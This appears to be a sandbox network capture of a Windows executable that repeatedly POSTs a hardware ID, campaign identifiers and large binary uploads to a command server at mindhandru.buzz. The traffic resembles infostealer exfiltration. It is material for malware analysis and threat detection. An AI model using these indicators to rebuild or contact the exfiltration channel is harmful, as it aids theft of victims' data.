2024-12-27 07:46:33 UTC | 12826 bytes | OUT | Data Raw: 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4c 30 58 39 39 4c 38 31 4a 46 4d 39 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 4c 30 58 39
Data Ascii: --KL0X99L81JFM9JAContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--KL0X99L81JFM9JAContent-Disposition: form-data; name="pid"2--KL0X99L81JFM9JAContent-Disposition: form-data; name="lid"PsFKDg--pablo--KL0X9
2024-12-27 07:46:34 UTC | 1134 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:46:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=nd7c9s7fh5aem6ritu784u0gvn; expires=Tue, 22 Apr 2025 01:33:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42Z7aOQFt%2F4cMydTBpU6%2FAMFjxOwTqQW8zg%2FOXUK6t3gColf3t7qzjscyYvQvgKseNiw8RDd8VVEWJes8LJtT%2Fuw%2BX6mGTZvpmcaBGgV4KGLCqb9VgiaT%2BoLO1Ix96uItSQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87b28e3a418cc8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1762&rtt_var=678&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13762&delivery_rate=1592148&cwnd=237&unsent_bytes=0&cid=db50bac25ea6ebe4&ts=1152&x=0"
2024-12-27 07:46:34 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:46:34 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.7
Source Port: 49708
Destination IP: 104.21.11.101
Destination Port: 443
PID: 788
Process: C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:35 UTC | 279 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=VG1F1F6GT0R0NIEL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15064
Host: mindhandru.buzz
2024-12-27 07:46:35 UTC | 15064 bytes | OUT | Data Raw: 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 47 31 46 31 46 36 47 54 30 52 30 4e 49 45 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 47
Data Ascii: --VG1F1F6GT0R0NIELContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--VG1F1F6GT0R0NIELContent-Disposition: form-data; name="pid"2--VG1F1F6GT0R0NIELContent-Disposition: form-data; name="lid"PsFKDg--pablo--VG
2024-12-27 07:46:36 UTC | 1133 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:46:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ps2oil3gr4kn9qjam7vk40eakb; expires=Tue, 22 Apr 2025 01:33:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Y4DSnww%2FCVqBWImO36BYCC%2FyaoxQkSdUNaMpt%2Fga1MLQVaJkPY8UW%2BXJyBQZO85%2FqQ720dCjdLnPwfJAArZT54C0Ws1tu7sdwF9jOG1XapR2wf4VDuQU40o3%2Bph2g1SCI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87b29caea641cd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1763&rtt_var=685&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16001&delivery_rate=1656267&cwnd=227&unsent_bytes=0&cid=14a2b75038ec55db&ts=813&x=0"
2024-12-27 07:46:36 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:46:36 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4
Source IP: 192.168.2.7
Source Port: 49714
Destination IP: 104.21.11.101
Destination Port: 443
PID: 788
Process: C:\Users\user\Desktop\IERiUft8Wi.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:37 UTC | 274 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=YCWJB536XGN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20359
Host: mindhandru.buzz
2024-12-27 07:46:37 UTC | 15331 bytes | OUT | Data Raw: 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 59 43 57 4a 42 35 33 36 58 47 4e 0d 0a 43 6f 6e 74
Data Ascii: --YCWJB536XGNContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--YCWJB536XGNContent-Disposition: form-data; name="pid"3--YCWJB536XGNContent-Disposition: form-data; name="lid"PsFKDg--pablo--YCWJB536XGNCont
2024-12-27 07:46:37 UTC | 5028 bytes | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-27 07:46:38 UTC | 1134 bytes | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 07:46:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=c7kpdm5d4b5llrpfoohtuticnb; expires=Tue, 22 Apr 2025 01:33:17 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ycgxjti1EFLNswPQPCR0K6N9tXiB33B%2BBInDOwVgOoMuMOB3uxea%2FF6suCjMCvgiEkW%2Bhhx8KpOZa2iWRD6ymd3kg4ILO8bhqJeul%2B%2Bl1NBoyQ4K%2BKONsswfbfjG22eVy1Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f87b2ab3c04437a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1974&rtt_var=782&sent=18&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21313&delivery_rate=1363211&cwnd=223&unsent_bytes=0&cid=94f39eeceacfa6ed&ts=1050&x=0"
2024-12-27 07:46:38 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:46:38 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49720 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 788 | Process: C:\Users\user\Desktop\IERiUft8Wi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:40 UTC | 278 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KZ3DWPSD5BMOKDKC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1227
Host: mindhandru.buzz
                                                                                                                2024-12-27 07:46:40 UTC1227OUTData Raw: 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 5a 33 44 57 50 53 44 35 42 4d 4f 4b 44 4b 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 5a
                                                                                                                Data Ascii: --KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="pid"1--KZ3DWPSD5BMOKDKCContent-Disposition: form-data; name="lid"PsFKDg--pablo--KZ
2024-12-27 07:46:42 UTC | 1127 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 27 Dec 2024 07:46:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=2p62j0dcg7n4ju84vl8cersdi2; expires=Tue, 22 Apr 2025 01:33:19 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Sv1wK%2BFD0zxjosDPOhziVHyGSuz%2BBcMK037MpAsWtzCnZBGICXX0iA%2Bgo4nr7zjPfqXk6VMQRAsq1C58I4wqqEpEx6bEkmVHwq6xkm22i9suIX%2FqPQVvDspxnqnCPccR3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f87b2bb7dfa7ce8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1823&rtt_var=697&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2141&delivery_rate=1601755&cwnd=200&unsent_bytes=0&cid=3f8fa36b46a2b5dd&ts=1735&x=0"
2024-12-27 07:46:42 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-27 07:46:42 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49727 | Destination IP: 104.21.11.101 | Destination Port: 443 | PID: 788 | Process: C:\Users\user\Desktop\IERiUft8Wi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 07:46:43 UTC | 283 bytes | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=WQGMY49GD2RBDCWT6P0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 583716
Host: mindhandru.buzz
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 35 36 39 38 41 30 30 46 34 37 41 42 43 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 51 47 4d 59 34 39 47 44 32 52 42 44 43 57 54 36 50 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                Data Ascii: --WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="hwid"955698A00F47ABCBBEBA0C6A975F1733--WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="pid"1--WQGMY49GD2RBDCWT6P0Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: ab 80 d1 c4 df 8c 74 58 ef 2d 31 26 ca 24 01 92 b2 81 bb fb 8c aa f4 9e f9 10 fb a0 37 d8 f1 78 3e 18 38 22 01 11 3f be f9 49 ff bb 51 0b 0b 41 13 31 d1 bb 98 2e 3d 1e 7e 41 5d 36 26 e9 9a 71 52 20 d3 1b c4 7c b7 77 26 be eb 52 91 73 5c dc d3 17 74 c4 bb c1 d0 5d 70 ca 4e 70 fd 3a 12 33 cc dd 97 57 8f 76 c3 3b b7 21 ad cf 17 b7 36 31 fe 3a ee c6 8d b1 39 f4 1b 74 44 ca 55 73 48 be 59 6b ef 69 a9 fa 22 58 80 bb f2 22 d3 a4 26 f4 89 1a f9 31 b9 c1 73 c8 9f ae f8 8f 25 92 75 ea a1 54 e5 46 0d 2a ba 9c 28 21 a1 ee 93 8b 69 8b f6 99 d0 f0 e5 d4 57 a6 ff ea 72 ee 95 94 dd e2 2b 20 25 39 40 7f ab ce 92 5a 83 8e 28 64 10 a3 7d 5c 33 cf 5d 13 14 f0 90 20 ad dd 19 3a 19 26 c0 58 cc 31 18 0b f7 f2 bf b2 1e e0 71 dc af 8e 45 fb 57 2a bb aa ca 04 53 c8 26 66 f3 dd 92
                                                                                                                Data Ascii: tX-1&$7x>8"?IQA1.=~A]6&qR |w&Rs\t]pNp:3Wv;!61:9tDUsHYki"X"&1s%uTF*(!iWr+ %9@Z(d}\3] :&X1qEW*S&f
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 42 a1 eb e5 e7 b7 4a f5 a7 36 f7 95 8f ab cd 59 ff 92 50 e1 5d 8e e6 dc fb b5 c7 4e b2 88 5c ea 6a 2b 3c 3b e0 37 ef c7 5e f9 b6 c3 65 cc 71 ba ff f5 cd f4 69 14 53 d2 de f7 fb 47 bb b2 9e 8f 0c c7 14 9f 9b 5b 25 73 93 79 27 c0 fa 68 ba c2 7f 03 2c e3 aa 48 85 88 d3 de 75 0d d5 29 2f 8f 12 e2 17 bc 9e 3c 52 02 2b e4 70 54 f3 68 6d 21 0e 25 fc ec 4e 21 44 09 71 47 43 e8 d0 5d e0 74 a6 7f ba 95 4c bd 57 c0 d6 8f 5d 06 ae b6 45 99 d6 57 b7 13 ad 18 68 93 03 45 4e b6 17 b6 a0 1d 82 53 e3 1d d4 90 80 4b ab 73 5a a8 30 34 16 03 01 ce eb 4b d4 6b 62 24 19 4a 97 90 fa 4c 93 0a f3 16 f8 7d 87 91 10 4a bb e3 9b 4d 93 44 a0 c5 d3 9f 06 54 83 bc b4 cc 9f cf c6 a7 8c fc 4e 0c 15 3f 9e 29 39 30 e8 f3 f1 d6 99 79 ec 89 64 bb 83 a4 ec 8b 2c 2b 6c df 4e 0f 8e d6 53 6c 40
                                                                                                                Data Ascii: BJ6YP]N\j+<;7^eqiSG[%sy'h,Hu)/<R+pThm!%N!DqGC]tLW]EWhENSKsZ04Kkb$JL}JMDTN?)90yd,+lNSl@
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: b2 f5 02 e5 c7 fe b1 b3 bd f4 4a 6b 77 a3 c9 01 a4 82 da 0a c8 fb 30 75 65 22 99 70 d8 b7 96 f5 ec 48 70 a1 1c 35 1d cd 7e 63 70 0a c4 c8 e6 87 c8 b8 f6 ab 30 94 ef 12 4e a4 a4 86 c5 af 0a 31 a6 5b 86 26 9d da d8 de 3b b7 3b 3c fa 84 1a f8 db d2 29 d5 d2 52 a2 8f 86 7d 96 08 1b 84 b8 ad 01 44 a2 10 19 34 3e aa 34 4a e4 08 1c ae 42 d3 f1 17 12 ec 25 4b 4e 9b 09 81 22 04 e2 91 8f cb ac 14 38 8d eb ea fc 90 90 3b 9b 27 34 a9 01 a3 d6 f5 e5 52 38 be 3e 69 45 1e 6d b6 ef 7f bc 86 00 bb 04 01 3f 54 2c 0d 64 23 c2 de 37 a1 3e a2 f1 1d 3f 3b b1 e0 e9 5b f7 01 c1 9f a3 fd 95 fa 60 39 f5 e9 6d 7b b8 9c 0d 69 a3 fd 28 ff ba c3 f3 cf 1a b9 7a db fc 65 1f 31 29 17 59 87 49 4f 81 2c 39 cc eb 42 d5 69 32 0b 6a 7d f2 83 ab 26 7b 1f 54 7a ec 21 7f 0d 7a e6 86 8b ad 4e d0
                                                                                                                Data Ascii: Jkw0ue"pHp5~cp0N1[&;;<)R}D4>4JB%KN"8;'4R8>iEm?T,d#7>?;[`9m{i(ze1)YIO,9Bi2j}&{Tz!zN
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 62 5a 33 b7 ed 53 d3 b1 ea f6 82 cc d8 4a 54 50 0c 7b f2 1a 01 1d ec d8 b6 21 00 1c b6 c0 dc 06 1d 44 46 9c a8 2d 6b 0b 0c 43 05 0b ac f6 36 55 49 2e 14 60 23 9b 09 32 c7 eb 7b 8d 1d e9 92 7b 11 e9 da 36 56 84 71 80 62 d7 8a e1 71 53 31 e8 c2 8d 43 57 b8 15 9d 89 d1 e0 57 0a 79 ed 68 27 c7 2a bf e1 19 e5 08 48 f0 01 7a 87 5a 61 85 02 d2 00 5b 73 6c 77 a4 1e 84 a6 f4 dd 97 27 42 a7 60 3e 5c 60 6a 14 b6 3d 4e 9d 03 b3 ad e6 6e 70 4d 95 94 a2 60 c3 48 45 87 a0 a8 e9 7a b4 dd fd 19 8b f1 44 98 39 27 08 b7 8a 9e da 41 47 e8 f8 4d 79 bf cf 32 49 f2 59 53 cf 29 9c 21 4c f5 17 1e d9 a2 9a 9f 49 bf a4 fa ba 9e f6 69 c4 ec 05 55 6f 20 de 8b 61 08 2c 2d b1 09 8d e2 62 31 22 d5 ff 1b b2 ca bb d4 d8 97 8b b9 81 ff fc bf ad 2f af 7e fa 43 ae 38 24 d6 dc 46 d7 04 87 65
                                                                                                                Data Ascii: bZ3SJTP{!DF-kC6UI.`#2{{6VqbqS1CWWyh'*HzZa[slw'B`>\`j=NnpM`HEzD9'AGMy2IYS)!LIiUo a,-b1"/~C8$Fe
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 65 53 d6 6a 29 c4 ab 65 f3 a3 07 5b 50 0d d7 53 40 13 a0 b6 b6 ac 16 3c b6 95 e2 f0 19 d0 cb 77 e3 d7 63 ee b5 c1 a8 4e ba d2 7c d2 a4 e1 b0 a3 bc fc b0 ad 63 8b dc 75 19 07 94 e1 b1 35 a7 d3 fa ca a8 15 0f 4e 8c 7a 5b 88 c1 8b 8d 7a 8f 63 e0 ab 44 c8 7b 2e 04 b8 31 26 c7 0e d9 12 d8 d9 74 95 86 3e 5f e8 17 9c 2d 7e 6e c6 fa 4a 18 fe f0 cd 9e 8a 00 93 42 8f c6 82 f6 d7 32 aa b7 68 b2 04 82 a4 49 aa 2f 6b 71 62 b1 be cb 24 b7 6a e9 cf 1b 04 d5 63 bc 85 0f 16 7b 5c 3f 8f 8e ff fc 4c 1b 23 a5 f0 d7 55 99 61 32 b6 f3 e3 a4 b5 24 83 38 bd d3 2f 11 5e 29 f4 af 17 52 15 e8 b0 12 5a 18 ee c9 e1 51 43 82 cb 07 50 2f 28 74 91 70 52 46 f4 20 af d3 70 be e3 9e 2b b7 d8 c3 cc 17 46 8b f3 e3 69 cc 6e 31 ce 7a 7b 32 93 e8 53 b0 be ff 65 d1 17 ee 48 c6 9c 21 04 d6 b6 c7
                                                                                                                Data Ascii: eSj)e[PS@<wcN|cu5Nz[zcD{.1&t>_-~nJB2hI/kqb$jc{\?L#Ua2$8/^)RZQCP/(tpRF p+Fin1z{2SeH!
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: c5 02 81 d7 48 f3 8c 02 51 70 e1 24 c8 ab 22 5a 3c 7b 81 a9 f8 f1 e5 f6 e5 97 cf 32 7e 47 0a 95 2e af f8 9f e3 65 8e c9 3e 54 5a 8e 33 ee dc 38 bc f2 75 b6 59 3b b6 ee 43 dd fa c1 c5 ca c7 5a 91 d6 8f 1b 1a 3e 7d 4d f9 a0 ee 73 eb 46 95 11 06 36 08 c5 3c e0 e3 50 df 58 07 1e 2f f9 0c cf 71 31 90 41 d2 e7 5d 4f fd ef 3e 24 f1 fb dc fc 10 a3 04 90 78 a0 e5 64 ca 49 7e fa 6e bc f8 23 ce b1 5f 08 6b 14 4c 9e d4 14 ee 81 23 a2 b0 3d 38 26 eb 0c 91 1b 60 d9 45 f5 db 4b 68 06 55 09 c8 36 e3 60 bd 85 d3 10 e1 8f f4 03 c4 44 21 b7 ef 54 fd 6b 77 5c f3 e2 2f 51 46 02 32 61 7e b8 9c 94 93 71 b8 64 65 f8 c4 df f8 ec 65 90 f0 bf fc 69 0b 0b cd 36 11 55 58 d8 66 ee 42 3a dc 4b 97 92 55 e8 ff f9 77 41 a6 6d 0e 19 d5 4a 75 94 01 8f 77 c3 16 b7 42 52 eb 42 14 8f b1 10 4d
                                                                                                                Data Ascii: HQp$"Z<{2~G.e>TZ38uY;CZ>}MsF6<PX/q1A]O>$xdI~n#_kL#=8&`EKhU6`D!Tkw\/QF2a~qdeei6UXfB:KUwAmJuwBRBM
                                                                                                                2024-12-27 07:46:43 UTC15331OUTData Raw: 3d 22 35 1d 8d e6 29 88 96 3f 09 0f a8 15 a6 38 30 37 c8 f7 e9 e1 68 d4 ef 53 0e fa 47 07 ed 6f 4a 8f d2 cb d1 33 ef 10 96 d9 7a b6 d8 fc b2 6d 3f 89 8a 6e 25 a1 44 37 00 4b 58 b8 7f b6 30 24 9b 59 32 a6 36 c5 89 24 99 43 3f c8 63 8b 2a fb 9e 61 57 88 b1 e6 6e e2 bc 2e 2d 5b e0 3c 3c 12 4f 0d de de d8 88 85 c0 95 c8 21 37 59 68 7d 3f 83 c9 5d 29 1d de 5a f0 bd bd 79 d2 b5 e5 1e e7 a0 b5 46 5c 64 c9 7f 16 3e aa 75 4a fd 1f 4c 51 d1 c3 1f 27 87 5b 6c 4b 8f c4 86 d3 99 e9 c0 b1 e7 2d ca 1a a2 1b 6d 60 05 20 6e c9 cb fd 66 03 52 85 5a 8c 8a 33 e4 56 4e 3c 0c c7 a9 93 f3 18 0e de 8b 7d 3b 09 21 cb 57 0b 12 8f 24 f2 b5 a3 06 fd 81 6e 3b 62 cb 46 4c 7c 88 73 5c 63 9a 3d 99 93 1c b2 f9 62 38 e0 29 bd 5d b0 fb 5c ac d5 49 c4 b3 03 4c 09 d0 2d 1b 5b ee 1c 5f c4 38
                                                                                                                Data Ascii: ="5)?807hSGoJ3zm?n%D7KX0$Y26$C?c*aWn.-[<<O!7Yh}?])ZyF\d>uJLQ'[lK-m` nfRZ3VN<};!W$n;bFL|s\c=b8)]\IL-[_8
